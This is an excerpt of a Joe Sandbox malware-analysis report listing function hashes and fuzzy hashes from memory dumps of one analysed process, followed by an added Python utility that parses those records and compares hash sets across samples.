• API ID:
• String ID:
• API String ID:
• Opcode ID: 67801b3d8429f2cba5f223be574f40d792cb6f14b594998f02a0030c32cda064
• Instruction ID: b30bae6a6728cd74a3727099ed50aedaed2bad623571a96fc355e988d15eb500
• Opcode Fuzzy Hash: 67801b3d8429f2cba5f223be574f40d792cb6f14b594998f02a0030c32cda064
• Instruction Fuzzy Hash: 6B21F7356001004FDFA3AB7CE988B2A37A9FB45708F104AA5D449C737ADB38DC45C791
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8fb6826fbd46b621c43359615f0748c6d0f47984c5f41a8324d69eeca567023
• Instruction ID: 5d4607ab9804e66d0daaa7807289a4a5dcfb3a29fb160c4fba82b5b980b2e43f
• Opcode Fuzzy Hash: d8fb6826fbd46b621c43359615f0748c6d0f47984c5f41a8324d69eeca567023
• Instruction Fuzzy Hash: 0D31BF35E00205CBDB45CFA8C49479FBBB2BF89304F14C55AE845AB396DB709842CB80
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0833cef413dcf81c8949255935ba4a64775f57a339de26009e1cca7c844588ee
• Instruction ID: 1ba62cd0f81fc4b3519ad3ccbd7f28904dd609f4cde69a71b966b1f52c3eb8a9
• Opcode Fuzzy Hash: 0833cef413dcf81c8949255935ba4a64775f57a339de26009e1cca7c844588ee
• Instruction Fuzzy Hash: 97218031E00209DBDB45CFA8D49469FFBB6FF89304F10D519E855AB395DB709842CB90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6c1e8574c7149eeb6fb7a4895a97359069bb921816905bf9919151a79721ebf2
• Instruction ID: ae0b8365f70283ddbc5164b676cb656755711f5b42c16a15115d81530d5043bf
• Opcode Fuzzy Hash: 6c1e8574c7149eeb6fb7a4895a97359069bb921816905bf9919151a79721ebf2
• Instruction Fuzzy Hash: 93219D30E00216CBCF59CFA4D8546EEB7B2AF89304F20861AEC55EB381DB709946CB51
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f7c7892569cccd5bc1c86ccdac2c239dbf5875e835a1c1dfa826d5c03ca6a7b4
• Instruction ID: 04464d3e9a3fd78fd1ff432a9ed1c8ca3bc5287bf58a3e9d1075090eec4b2f9f
• Opcode Fuzzy Hash: f7c7892569cccd5bc1c86ccdac2c239dbf5875e835a1c1dfa826d5c03ca6a7b4
• Instruction Fuzzy Hash: 75212B70A002058FDB94EB78C559A9E7BF1EB49304F1044A8F986DB365EB3A9D41CB90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3257713525.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_100d000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5786064e1af2c6a82c4c0e8d491b08a0552bbebcd6f13af2239756ce9cb20fb
• Instruction ID: 687392504a8df6364959c844a15efb463b1305f1ad171d1b705db70cf2823275
• Opcode Fuzzy Hash: d5786064e1af2c6a82c4c0e8d491b08a0552bbebcd6f13af2239756ce9cb20fb
• Instruction Fuzzy Hash: 6A21D371604204DFEB16DFA8D984B16BFA5EB84354F20C5A9E98D4B296C33AD406CB72
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 398f8483b36cdeab07435a1c2e8bb760cecc06fc465f418e794d96f644cfdf9e
• Instruction ID: 9493e7d881d5f1affdb6aa2c32c546da0a37aa9ca37f760457b30e90d83a1f93
• Opcode Fuzzy Hash: 398f8483b36cdeab07435a1c2e8bb760cecc06fc465f418e794d96f644cfdf9e
• Instruction Fuzzy Hash: 5A218031B10105CFEB54DB69C954BAF7BF5AF88714F118065E905EB3A5DA719D0087A0
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 01a0adfc64a480a1627920c0c6525c9792f30c4cfbff1be74867f53121fb617d
• Instruction ID: 843edad6a7e09a347304c6aec34bc7779727d88602de1e5507a45bcfe303a294
• Opcode Fuzzy Hash: 01a0adfc64a480a1627920c0c6525c9792f30c4cfbff1be74867f53121fb617d
• Instruction Fuzzy Hash: 61218E30E0021ADBCB59CFA8C85459FB7B2AF89354F10851AEC55BB380DB70A946CB51
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d89b5b6668e4decdf9fde2b8375f787d79eb36e7f20328802b0277776fd899d5
• Instruction ID: a02ef65690d047db8f0b17705d76fb74478cd9682331e2be41b43c0916300ca2
• Opcode Fuzzy Hash: d89b5b6668e4decdf9fde2b8375f787d79eb36e7f20328802b0277776fd899d5
• Instruction Fuzzy Hash: BE212A30B40205CFDB95EB78C5587AE77F2AF49204F1004A8D986EB3A5DB769D41CBA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9285f3ece523c5d56c2655352ec7b4c1871bc467ddfe50392099315d805520af
• Instruction ID: 68b7e7cb944f332f7c72b297863ac2810a61bbbf10a4eb63834a37ca664d39dd
• Opcode Fuzzy Hash: 9285f3ece523c5d56c2655352ec7b4c1871bc467ddfe50392099315d805520af
• Instruction Fuzzy Hash: 16212A30B40205CFDB94EB78C5187AE77F6AF89204F1004A8D986EB3A5DF769D41CBA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b502ad3d82e7b0f0cd5b453a85c1029eada1ba371991e318153ba15fc0edaa67
• Instruction ID: f59fccc0b5fea736778c43561835af26f0546c2bf62bec658b8b54045f82279e
• Opcode Fuzzy Hash: b502ad3d82e7b0f0cd5b453a85c1029eada1ba371991e318153ba15fc0edaa67
• Instruction Fuzzy Hash: 4121C3396001054FDFA2EB6CF988B1A37A9FB45708F104A75D44AC736AEB38DC45CB91
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 206113503a1e1669849e59b0030ac2219e0d02b15f4a6e24c0eec2d18bc43165
• Instruction ID: edfdffef4c91cffc93af18f3ca94a1b3ae86491a1a00b58e26e8121b557c5f9d
• Opcode Fuzzy Hash: 206113503a1e1669849e59b0030ac2219e0d02b15f4a6e24c0eec2d18bc43165
• Instruction Fuzzy Hash: D821EB70700205CFDB94EB78D958A9E77F1EB49704F1044A8F946EB365EB369D40CB91
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 26c8c78cf6cf3a5a7f2864631127cde20961801c557a54c0d9f0237fc45187b4
• Instruction ID: ad521b4e5d8a0432d8b377c6bef4bb2cb95c9965f51ec209c343d91f07df63fa
• Opcode Fuzzy Hash: 26c8c78cf6cf3a5a7f2864631127cde20961801c557a54c0d9f0237fc45187b4
• Instruction Fuzzy Hash: 3511C431B052044BEFD65AB8E514B7F37E5EB41314F2049BAF8C5CB29ADA68C8458BD1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b5368fd7bf6ceb6000308e917028b50909f35347f1e9eb483a753a9c9e3e253b
• Instruction ID: 731dff6bac1d6dd22b98007f0a87de9b263fdaae4d7f0f66f49b510247f62636
• Opcode Fuzzy Hash: b5368fd7bf6ceb6000308e917028b50909f35347f1e9eb483a753a9c9e3e253b
• Instruction Fuzzy Hash: AA116030B002058BEFD56A7DD544B3F76D5EB85314F2049BAE8C6CB29ADA24CC458BD1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5b1d6ffa5623c0122d5ec6f218ca5a88f81d9831725bec2713810ebe7efd171
• Instruction ID: 46128a72d148d88118737952d97d5c72c85af65be4450bd8b8a42f2bb789053a
• Opcode Fuzzy Hash: d5b1d6ffa5623c0122d5ec6f218ca5a88f81d9831725bec2713810ebe7efd171
• Instruction Fuzzy Hash: 6B1129352002058FDB4AEBBCF444B9E7BA6EF41314F4046BAD4498B3A6DB35E906C751
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09ad228616ff41e608a045b8995a8840141e979ddd781f3925d9d3cbf2463ab4
• Instruction ID: 7a6ab2a3c3c768ab3db87405954b5335fc7e77d13fe9a11cd522ef2d6c2bb03b
• Opcode Fuzzy Hash: 09ad228616ff41e608a045b8995a8840141e979ddd781f3925d9d3cbf2463ab4
• Instruction Fuzzy Hash: 4F016D31A012158FCFA1EFBC84402EF7BE4AB48214B1414B9EC46E7600EA35E841CBA1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3257713525.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_100d000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
• Instruction ID: 71ea15a3db48f15bd8586a592fdbed05223a2e802ec7b629684331fa5f31c809
• Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
• Instruction Fuzzy Hash: 8711D075504280CFDB12CF94D5C4B15FFA2FB44314F24C6AAE84D4B696C33AD40ACB62
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a5dcab7217b1d55db8d933047bdbd1aa67ac3a6cfc7e1624cdee3f0785bdac5d
• Instruction ID: 4adcbb527694fd3b90bc366afce55269c557133103ce986de16035ad99782a68
• Opcode Fuzzy Hash: a5dcab7217b1d55db8d933047bdbd1aa67ac3a6cfc7e1624cdee3f0785bdac5d
• Instruction Fuzzy Hash: 97019230A002058BDB44EF99E984B8ABBB9FF84310F54C174D84C5B29AEB70E905C7A1
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 70d05dc9578da31f7ab0f009ecbdce61e2b71641700ad93d5bcc0cbef66ad0f6
• Instruction ID: 2ffc87782400c53237565d9ad922d211729626f5f70e1472e7f79eedb10a3c9c
• Opcode Fuzzy Hash: 70d05dc9578da31f7ab0f009ecbdce61e2b71641700ad93d5bcc0cbef66ad0f6
• Instruction Fuzzy Hash: DDF02B33A04150CBDBA28BAC84902EE7FE0EE5521571D00D6DCC6DB715D731D842CB51
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8d2cc48510e4b2ac56132b73a010bf31c290a4ee9cd4db8eccb39979fca02965
• Instruction ID: 7aad5ce9a0de324618eb6d0924509cc643ff62b3937d84ffc8dc21d6f5369de2
• Opcode Fuzzy Hash: 8d2cc48510e4b2ac56132b73a010bf31c290a4ee9cd4db8eccb39979fca02965
• Instruction Fuzzy Hash: BEF03739B40108CFCB14EB74D5A8B6C77F2EF88315F6444A9E90A8B3A0CB35AD02CB40
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2dd78523a6c72e69afb056c6e9798079e22ab36f91c79dc95cd58cae8a37d69a
• Instruction ID: 79b075ad2fccbe2d2c1dbe82cd94124427267f1192d75e7d5331d671dd5f77b6
• Opcode Fuzzy Hash: 2dd78523a6c72e69afb056c6e9798079e22ab36f91c79dc95cd58cae8a37d69a
• Instruction Fuzzy Hash: 9FF01235900109DFCB09EFB8F954A9D77B5EF40708F504575C40897265EB316A098791
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9db68c57dce2ecc4a7e7fd66cc82bcca7e0bd13905fa45a0d70d42defefe6578
• Instruction ID: 577d8e6f295ec130be2fa0a806d62cb49673e815c9536a1a0c8a18381dbe6b07
• Opcode Fuzzy Hash: 9db68c57dce2ecc4a7e7fd66cc82bcca7e0bd13905fa45a0d70d42defefe6578
• Instruction Fuzzy Hash: 49C012363080908F8A02A728E0644B937B1DBCA16932402AAE188CB332CE22A802CB00
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3267493749.0000000005F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F20000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_5f20000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: baa15ce5661bc82c4e99c034622920e66cf50d7adfb8319281f7b1308692628f
• Instruction ID: 894d026320fd682e304a506885a3de051b9bb4a0d217fc1291d7c0ca4f6e7829
• Opcode Fuzzy Hash: baa15ce5661bc82c4e99c034622920e66cf50d7adfb8319281f7b1308692628f
• Instruction Fuzzy Hash: C9B092B28503664FD3419D20A947B903764E300312F05002EA0118A866EB288206B904
Uniqueness
• Uniqueness Score: -1.00%
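Each record above describes one function recovered from a memory dump of process 17 (the .sdmp name's first dotted field, 0x11, and its second, the dump round 2, are repeated in the snapshot name hcaresult_17_2_<base>): an Opcode ID that in this report always equals the Opcode Fuzzy Hash, an Instruction ID, an Instruction Fuzzy Hash, and a Uniqueness Score of -1.00%. These hashes are what an analyst pivots on when asking whether another sample shares code with this one. The Python below is an added example, not Joe Sandbox code and not part of the report: it parses such records, cross-checks the .sdmp name against the snapshot name, and builds the set of Instruction Fuzzy Hashes for comparison against another sample's set. SAMPLE is two records copied from the report; the FunctionRecord field names, the snapshot naming rule (inferred from the records here), the reading of -1.00% as "not computed" and the OTHER_SAMPLE hash set are assumptions of this example.

```python
"""Parse Joe Sandbox per-function 'Memory Dump Source / Similarity / Uniqueness'
records into structured form and a comparable set of function hashes.
Added example, not Joe Sandbox code. SAMPLE is copied from the report; the field
names, the hcaresult_<proc>_<round>_<base> rule and OTHER_SAMPLE are assumptions."""
import re
from dataclasses import dataclass
from typing import Optional

SAMPLE = """\
Memory Dump Source
• Source File: 00000011.00000002.3258005462.0000000001050000.00000040.00000800.00020000.00000000.sdmp, Offset: 01050000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_1050000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9a636f71ffb8af98b847c741e362a36d0599a648619db9bc0d7569c87f628cb8
• Instruction ID: dee1642f68daaa87bbaa7a5c5e7328d83d1903aa1ee23f0bae627729ae8d7bcb
• Opcode Fuzzy Hash: 9a636f71ffb8af98b847c741e362a36d0599a648619db9bc0d7569c87f628cb8
• Instruction Fuzzy Hash: F941CCB4D00249DFDB14DFA9C584ADEBFF5FF48310F248429E809AB254DB75A946CB90
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000011.00000002.3257713525.000000000100D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0100D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_100d000_TuZRpLi.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d5786064e1af2c6a82c4c0e8d491b08a0552bbebcd6f13af2239756ce9cb20fb
• Instruction ID: 687392504a8df6364959c844a15efb463b1305f1ad171d1b705db70cf2823275
• Opcode Fuzzy Hash: d5786064e1af2c6a82c4c0e8d491b08a0552bbebcd6f13af2239756ce9cb20fb
• Instruction Fuzzy Hash: 6A21D371604204DFEB16DFA8D984B16BFA5EB84354F20C5A9E98D4B296C33AD406CB72
Uniqueness
• Uniqueness Score: -1.00%
"""

RECORD_HEADER = re.compile(r"^Memory Dump Source[ \t]*$", re.M)
FIELD = re.compile(r"^[• \t]*(?P<key>[A-Za-z ]+?):[ \t]*(?P<val>.*?)[ \t]*$", re.M)
SOURCE = re.compile(r"(?P<file>\S+\.sdmp), Offset: (?P<off>[0-9A-Fa-f]+), based on PE: (?P<pe>true|false)")
SNAPSHOT = re.compile(r"hcaresult_(?P<proc>\d+)_(?P<round>\d+)_(?P<base>[0-9A-Fa-f]+)_")

@dataclass(frozen=True)
class FunctionRecord:
    source_file: str
    process_index: int            # first dotted field of the .sdmp name, hex (0x11 = 17)
    dump_round: int               # second dotted field, hex
    offset: int
    based_on_pe: bool
    snapshot_file: str
    opcode_id: str                # identical to opcode_fuzzy_hash throughout this report
    instruction_id: str
    opcode_fuzzy_hash: str
    instruction_fuzzy_hash: str
    uniqueness: Optional[float]   # None when the report prints -1.00% (assumed 'not computed')

def parse_record(chunk: str) -> FunctionRecord:
    """One record; a truncated record raises instead of yielding half a function."""
    f = {m["key"]: m["val"] for m in FIELD.finditer(chunk)}
    missing = [k for k in ("Source File", "Snapshot File", "Opcode ID", "Instruction ID",
                           "Opcode Fuzzy Hash", "Instruction Fuzzy Hash", "Uniqueness Score") if k not in f]
    if missing:
        raise ValueError(f"truncated record, missing {missing}")
    src = SOURCE.fullmatch(f["Source File"])
    if src is None:
        raise ValueError(f"unexpected Source File line: {f['Source File']!r}")
    parts = src["file"].split(".")
    score = float(f["Uniqueness Score"].rstrip("%"))
    return FunctionRecord(
        source_file=src["file"], process_index=int(parts[0], 16), dump_round=int(parts[1], 16),
        offset=int(src["off"], 16), based_on_pe=src["pe"] == "true",
        snapshot_file=f["Snapshot File"], opcode_id=f["Opcode ID"],
        instruction_id=f["Instruction ID"], opcode_fuzzy_hash=f["Opcode Fuzzy Hash"],
        instruction_fuzzy_hash=f["Instruction Fuzzy Hash"],
        uniqueness=None if score < 0 else score)

def parse_records(text: str) -> list:
    """Split a pasted report section on its 'Memory Dump Source' headers."""
    return [parse_record(c) for c in RECORD_HEADER.split(text) if c.strip()]

def consistency_issues(rec: FunctionRecord) -> list:
    """The snapshot name repeats process index, dump round and base address of the
    .sdmp name; a mismatch means the record was mis-pasted or mixed with another."""
    m = SNAPSHOT.match(rec.snapshot_file)
    if m is None:
        return [f"snapshot name not understood: {rec.snapshot_file}"]
    checks = (("process index", int(m["proc"]), rec.process_index),
              ("dump round", int(m["round"]), rec.dump_round),
              ("base address", int(m["base"], 16), rec.offset))
    return [f"{name} mismatch" for name, a, b in checks if a != b]

def instruction_hash_set(records) -> set:
    """Instruction Fuzzy Hash is the per-function value to pivot on across samples."""
    return {r.instruction_fuzzy_hash for r in records}

def jaccard(a: set, b: set) -> float:
    return 1.0 if not a and not b else len(a & b) / len(a | b)

# Constructed second sample for the comparison: one hash shared with SAMPLE, one not.
OTHER_SAMPLE = {"F941CCB4D00249DFDB14DFA9C584ADEBFF5FF48310F248429E809AB254DB75A946CB90", "00" * 35}
```

Running `parse_records(SAMPLE)` yields two records at offsets 0x1050000 and 0x100D000 for which `consistency_issues` returns nothing; `jaccard(instruction_hash_set(recs), OTHER_SAMPLE)` is 1/3, since the two sets share one of three distinct function hashes. The parser accepts the report's bulleted and unbulleted "Uniqueness Score" line alike and refuses a record that lacks any of its hash fields, so a partially pasted section fails loudly rather than contributing an incomplete function to the comparison set.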